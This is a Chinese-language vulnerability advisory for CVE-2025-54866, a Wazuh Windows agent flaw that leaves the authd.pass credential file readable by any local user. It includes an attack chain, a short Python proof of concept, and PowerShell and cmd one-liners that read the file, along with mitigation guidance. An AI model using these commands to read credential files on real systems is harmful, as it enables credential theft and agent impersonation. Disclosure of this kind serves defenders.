IPBUF安全漏洞报告
English
CVE-2025-54866 CVSS 5.5 中危

CVE-2025-54866 Wazuh Windows认证密码文件权限配置错误漏洞

披露日期: 2025-11-21

漏洞信息

漏洞编号
CVE-2025-54866
漏洞类型
访问控制/权限配置错误
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Wazuh

相关标签

CVE-2025-54866访问控制权限配置错误信息泄露WazuhWindows本地提权认证凭据泄露

漏洞概述

CVE-2025-54866是Wazuh安全平台在Windows系统上的一个权限配置错误漏洞。Wazuh是一款免费开源的威胁预防、检测和响应平台,广泛应用于企业安全运营。在受影响版本中,Windows安装路径下的认证密码文件"C:\Program Files (x86)\ossec-agent\authd.pass"由于缺少正确的访问控制列表(ACL)配置,导致该文件对系统中所有"Authenticated Users"(认证用户)可读。这意味着任何具有本地用户账户的合法用户都能读取存储在authd.pass文件中的认证密码信息。攻击者获取该密码后可能用于进一步的网络横向移动或权限提升攻击,对系统机密性造成严重影响。

技术细节

该漏洞属于Windows访问控制配置错误类型。在正常安全配置下,包含敏感认证信息的文件应当仅允许管理员或特定服务账户读取。然而Wazuh在4.3.0到4.13.0版本的Windows安装过程中,未能正确设置authd.pass文件的NTFS权限。该文件默认位于"C:\Program Files (x86)\ossec-agent\authd.pass",存储了Wazuh Agent连接到Manager所需的认证凭据。由于继承自父目录或默认的Everyone/Users组权限,所有本地认证用户(包括低权限账户)都具有读取权限。攻击者只需具备本地登录能力,即可通过文件管理器、命令行工具(如type、Get-Content)或任何能访问文件系统的程序读取该密码文件。成功利用后可获取Agent认证密钥,用于伪装成合法Agent与Wazuh Manager通信。

攻击链分析

STEP 1
1
攻击者获得目标Windows系统的本地用户访问权限(通过钓鱼、弱密码或其他方式)
STEP 2
2
使用低权限账户登录系统,访问"C:\Program Files (x86)\ossec-agent\authd.pass"文件
STEP 3
3
读取authd.pass文件内容,获取Wazuh Agent认证密码
STEP 4
4
利用获取的密码伪装成合法Agent连接到Wazuh Manager
STEP 5
5
在Manager端执行命令或窃取其他Agent的监控数据

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-54866 PoC - Read Wazuh authd.pass file # Requires: Local authenticated user access on Windows import os authd_pass_path = r"C:\Program Files (x86)\ossec-agent\authd.pass" # Method 1: Direct file read try: with open(authd_pass_path, 'r') as f: password = f.read().strip() print(f"[+] Successfully read authd.pass") print(f"[+] Password content: {password}") except PermissionError: print("[-] Permission denied - file not accessible") except FileNotFoundError: print("[-] File not found - Wazuh may not be installed") # Method 2: Using PowerShell # powershell -Command "Get-Content 'C:\Program Files (x86)\ossec-agent\authd.pass'" # Method 3: Using cmd # cmd /c "type \"C:\Program Files (x86)\ossec-agent\authd.pass\""

影响范围

Wazuh 4.3.0 至 4.13.0之前的版本(Windows平台)

防御指南

临时缓解措施
在官方补丁发布前,可通过手动配置NTFS权限缓解:将authd.pass文件的访问权限限制为仅SYSTEM和Administrators组可读,移除其他所有用户和组的权限。可使用Windows内置icacls工具或文件属性安全选项卡进行配置。同时建议监控对authd.pass文件的访问日志,及时发现异常读取行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表